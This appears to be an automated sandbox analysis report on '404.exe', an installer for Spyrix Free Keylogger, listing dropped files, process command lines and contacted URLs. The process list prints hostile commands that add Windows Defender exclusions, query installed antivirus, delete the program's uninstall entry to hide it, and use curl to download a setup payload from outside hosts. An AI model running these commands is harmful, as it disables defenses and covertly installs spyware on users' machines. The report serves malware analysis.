C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\38b5bf3b-2a32-4636-ac09-779581aade41.cmd
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\l
ASCII text, with no line terminators
modified
C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\stld2.tmp
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\stld3.tmp
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\REG214A.tmp
Windows Registry little-endian text (Win2K or above)
dropped
C:\Users\user\AppData\Local\Temp\REG8851.tmp
Windows Registry little-endian text (Win2K or above)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1idi3d0c.dxg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1n51sivl.hfg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32edlxif.4xa.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3jcee02h.amw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3r2di4fb.awu.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ba3ii2y2.mvf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cf0hrlcr.21h.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e4fgviju.50p.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eielro4i.flp.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g0ugnfmy.dnf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjuz1lx3.p43.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlhu3o4o.5zr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iignm4me.gfw.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ils5v2xc.eo2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iq3bahss.1ky.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j3imhnh3.vyf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_johbmj3w.wni.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrkiipny.30m.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l3e3c2nx.yob.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nkkbjr25.4rn.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_no01w45x.k5i.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogmbzsj5.b5s.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojpbobye.giz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pb4o1vx5.qig.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pc1tjfq4.bxg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phuip4ol.ige.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmwby1uc.sce.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0nbg3hf.evx.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3twb1aj.45u.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tceif5bz.vio.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ua35ajff.0tn.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uvesquot.dlr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xllvaggj.tpq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xn5mol1c.ylp.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xradeo5c.vwb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0sdding.qob.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y54oiyku.wkq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yv4wjwos.bjx.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ywawfwia.2c3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zyyqjrmw.b2y.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\$ywr34c.tmp
ASCII text, with CRLF, CR line terminators
dropped
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\_isetup\_iscrypt.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\_isetup\_isdecmp.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\_isetup\_setup64.tmp
PE32+ executable (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\d.cmd
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\ex
Windows Registry little-endian text (Win2K or above)
dropped
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\ex.cmd
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\iMsgInfo.bmp
PC bitmap, Windows 3.x format, 48 x 48 x 24, resolution 2835 x 2835 px/m, cbSize 6966, bits offset 54
dropped
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\psout
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\psout_p
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\pswd.cmd
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\sout
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\sout_p
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\spmmout
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\spmmout_p
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\spsout
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\spsout_p
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\webbrowser.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\nse
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Temp\sfkname.tmp
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\tpl556z6i5ctbzg
ASCII text, with very long lines (837), with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 03:11:41 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 03:11:41 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 03:11:41 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 03:11:41 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 03:11:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
Chrome Cache Entry: 622
gzip compressed data, max speed, from Unix, original size modulo 2^32 27077
downloaded
Chrome Cache Entry: 623
Java source, ASCII text, with very long lines (1184)
downloaded
Chrome Cache Entry: 624
Java source, ASCII text, with very long lines (3701)
dropped
Chrome Cache Entry: 625
Java source, ASCII text, with very long lines (1184)
dropped
Chrome Cache Entry: 626
Java source, ASCII text, with very long lines (522)
downloaded
Chrome Cache Entry: 627
ASCII text
dropped
Chrome Cache Entry: 628
Java source, ASCII text, with very long lines (612)
dropped
Chrome Cache Entry: 629
ASCII text
downloaded
Chrome Cache Entry: 630
ASCII text, with very long lines (2465)
downloaded
Chrome Cache Entry: 631
ASCII text, with very long lines (773)
downloaded
Chrome Cache Entry: 632
PNG image data, 184 x 184, 8-bit/color RGBA, non-interlaced
dropped
Chrome Cache Entry: 633
Java source, ASCII text, with very long lines (3701)
downloaded
Chrome Cache Entry: 634
ASCII text, with very long lines (628)
dropped
Chrome Cache Entry: 635
Java source, ASCII text, with very long lines (612)
downloaded
Chrome Cache Entry: 636
ASCII text, with very long lines (1097)
dropped
Chrome Cache Entry: 637
gzip compressed data, max speed, from Unix, original size modulo 2^32 1269714
dropped
Chrome Cache Entry: 638
ASCII text
downloaded
Chrome Cache Entry: 639
Java source, ASCII text, with very long lines (4588)
dropped
Chrome Cache Entry: 640
Java source, ASCII text, with very long lines (795)
dropped
Chrome Cache Entry: 641
Java source, ASCII text, with very long lines (4588)
downloaded
Chrome Cache Entry: 642
Java source, ASCII text, with very long lines (1391)
dropped
Chrome Cache Entry: 643
ASCII text, with very long lines (773)
dropped
Chrome Cache Entry: 644
Java source, Unicode text, UTF-8 text, with very long lines (731)
downloaded
Chrome Cache Entry: 645
gzip compressed data, max speed, from Unix, original size modulo 2^32 1269714
downloaded
Chrome Cache Entry: 646
ASCII text, with very long lines (1512)
downloaded
Chrome Cache Entry: 647
ASCII text
downloaded
Chrome Cache Entry: 648
ASCII text, with very long lines (3064)
downloaded
Chrome Cache Entry: 649
Java source, ASCII text, with very long lines (522)
dropped
Chrome Cache Entry: 650
ASCII text
downloaded
Chrome Cache Entry: 651
C++ source, Unicode text, UTF-8 text
downloaded
Chrome Cache Entry: 652
ASCII text, with very long lines (5945)
dropped
Chrome Cache Entry: 653
Java source, ASCII text, with very long lines (837)
dropped
Chrome Cache Entry: 654
gzip compressed data, max speed, from Unix, original size modulo 2^32 61324
downloaded
Chrome Cache Entry: 655
Java source, Unicode text, UTF-8 text, with very long lines (731)
dropped
Chrome Cache Entry: 656
ASCII text, with no line terminators
downloaded
Chrome Cache Entry: 657
Web Open Font Format (Version 2), TrueType, length 44112, version 1.0
downloaded
Chrome Cache Entry: 658
Web Open Font Format (Version 2), TrueType, length 43608, version 1.0
downloaded
Chrome Cache Entry: 659
ASCII text
downloaded
Chrome Cache Entry: 660
gzip compressed data, max speed, from Unix, original size modulo 2^32 27077
dropped
Chrome Cache Entry: 661
ASCII text
dropped
Chrome Cache Entry: 662
ASCII text, with very long lines (628)
downloaded
Chrome Cache Entry: 663
ASCII text, with very long lines (1097)
downloaded
Chrome Cache Entry: 664
HTML document, ASCII text
downloaded
Chrome Cache Entry: 665
C++ source, Unicode text, UTF-8 text
dropped
Chrome Cache Entry: 666
ASCII text, with very long lines (2720)
downloaded
Chrome Cache Entry: 667
PNG image data, 184 x 184, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 668
Java source, ASCII text, with very long lines (1391)
downloaded
Chrome Cache Entry: 669
Java source, Unicode text, UTF-8 text, with very long lines (5161)
downloaded
Chrome Cache Entry: 670
ASCII text, with very long lines (5945)
downloaded
Chrome Cache Entry: 671
Java source, Unicode text, UTF-8 text, with very long lines (5161)
dropped
Chrome Cache Entry: 672
Java source, ASCII text, with very long lines (837)
downloaded
Chrome Cache Entry: 673
Java source, ASCII text, with very long lines (795)
downloaded
\Device\ConDrv
ASCII text, with CR, LF line terminators
dropped
\Device\Null
ASCII text, with CRLF line terminators
dropped
There are 1025 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\404.exe
"C:\Users\user\Desktop\404.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\\38b5bf3b-2a32-4636-ac09-779581aade41.cmd
malicious
C:\Windows\SysWOW64\reg.exe
reg query "HKU\S-1-5-19\Environment"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41'"
malicious
C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\404.exe
"C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\404.exe"
malicious
C:\Users\user\AppData\Local\Temp\is-PDS4H.tmp\404.tmp
"C:\Users\user\AppData\Local\Temp\is-PDS4H.tmp\404.tmp" /SL5="$70296,32862490,227328,C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\404.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\d.cmd
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\d.cmd
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\ex.cmd
malicious
C:\Windows\System32\reg.exe
reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\ex" /y
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\pswd.cmd
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -ExclusionProcess '404.*'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\ex.cmd
malicious
C:\Windows\System32\reg.exe
reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-98UMI.tmp\ex" /y
malicious
C:\Windows\SysWOW64\regedit.exe
"regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"
malicious
C:\Windows\SysWOW64\reg.exe
"reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe"
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c plist.cmd
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user\AppData\Local\Temp\nse"
malicious
C:\Windows\SysWOW64\NETSTAT.EXE
netstat.exe -e
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_6E3F587357F4ED7D7098E81DD0F931D7 https://spyrix.net/dashboard/prg-actions
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_6E3F587357F4ED7D7098E81DD0F931D7 https://spyrix.net/dashboard/prg-actions
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_6E3F587357F4ED7D7098E81DD0F931D7 https://spyrix.net/dashboard/prg-actions
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_6E3F587357F4ED7D7098E81DD0F931D7 https://spyrix.net/dashboard/prg-actions
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c exit 83
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c exit 112
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_6E3F587357F4ED7D7098E81DD0F931D7 https://spyrix.net/dashboard/prg-actions
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c exit 121
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c exit 114
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c exit 105
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c exit 120
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
C:\Windows\SysWOW64\curl.exe
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\404.exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\wbem\WMIC.exe
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\wbem\WMIC.exe
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\timeout.exe
timeout 20
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\timeout.exe
timeout 6
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1992,i,7642433025411638348,18067378609004413491,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\tasklist.exe
TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
C:\Windows\SysWOW64\find.exe
find "spm"
C:\Windows\SysWOW64\tasklist.exe
TASKLIST /FI "IMAGENAME eq sem.exe" /FO CSV /NH
C:\Windows\SysWOW64\find.exe
find "sem"
C:\Windows\SysWOW64\tasklist.exe
TASKLIST /FI "IMAGENAME eq spkl.exe" /FO CSV /NH
C:\Windows\SysWOW64\find.exe
find "spkl"
C:\Windows\SysWOW64\tasklist.exe
TASKLIST /FI "IMAGENAME eq clv.exe" /FO CSV /NH
C:\Windows\SysWOW64\find.exe
find "clv"
There are 70 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://www.jrsoftware.org/0
unknown
https://dashboard.spyrix.com/account/login-from-program?email=
unknown
https://api.dropbox.com/1/fileops/copy
unknown
https://dashboard.spyrix.com/account/login-from-program
unknown
https://spyrix.net/usr/monitor/
unknown
https://Spyrix.net/dashboard/prg-list
158.69.117.119
https://curl.haxx.se/libcurl/c/curl_easy_setopt.html
unknown
https://dashboard.spyrix.com/qqS
unknown
https://www.spyrix.com/purchase.php?prg=sfk
unknown
http://filedn.comd
unknown
http://www.indyproject.org/
unknown
https://api.dropbox.com/1/fileops/delete
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe_F
unknown
https://cdn.cdndownload.net/dashboard30/assets/Input-34212571.css
95.181.182.182
https://api.dropbox.com/1/oauth/request_token
unknown
https://curl.haxx.se/docs/http-cookies.html#
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.exe
unknown
http://www.spyrix.com/pro_upgrade.htm?lic=
unknown
https://spyrix.app/manual/kaspersky-loader/step1
unknown
https://spyrix.app/manual/kaspersky-loader/step2
unknown
http://crl.certum.pl/ca.crl0:
unknown
https://spyrix.net/dashboard/av
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C:
unknown
https://spyrix.net/dashboard/prg-actions
158.69.117.119
https://cdn.cdndownload.net/proxy/list.json
unknown
https://curl.haxx.se/docs/copyright.htmlD
unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfk
167.114.14.170
https://cdn.cdndownload.net/dashboard30/assets/index-1178777c.js
95.181.182.182
https://dashboard.actualkeylogger.com/account/login-from-program
unknown
https://dashboard.spyrix.com/cdn.js
158.69.117.119
http://www.myspace.com/search/
unknown
https://api.dropbox.com/1/fileops/create_folder?
unknown
https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.js
95.181.182.182
HTTPS://SPYRIX.NET/DASHBOARD/PRG-LIST
unknown
https://dashboard.spyrix.com/;
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
167.114.14.168
https://www.spyrix.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.spyrix.com
unknown
https://api.dropbox.com/1/oauth/access_token?SV
unknown
https://cdn.cdndownload.net/dashboard30/assets/ButtonTemplate-fd9601a7.css
95.181.182.182
http://www.innosetup.com/
unknown
https://spyrix.net/dashboard/proxy/upload
unknown
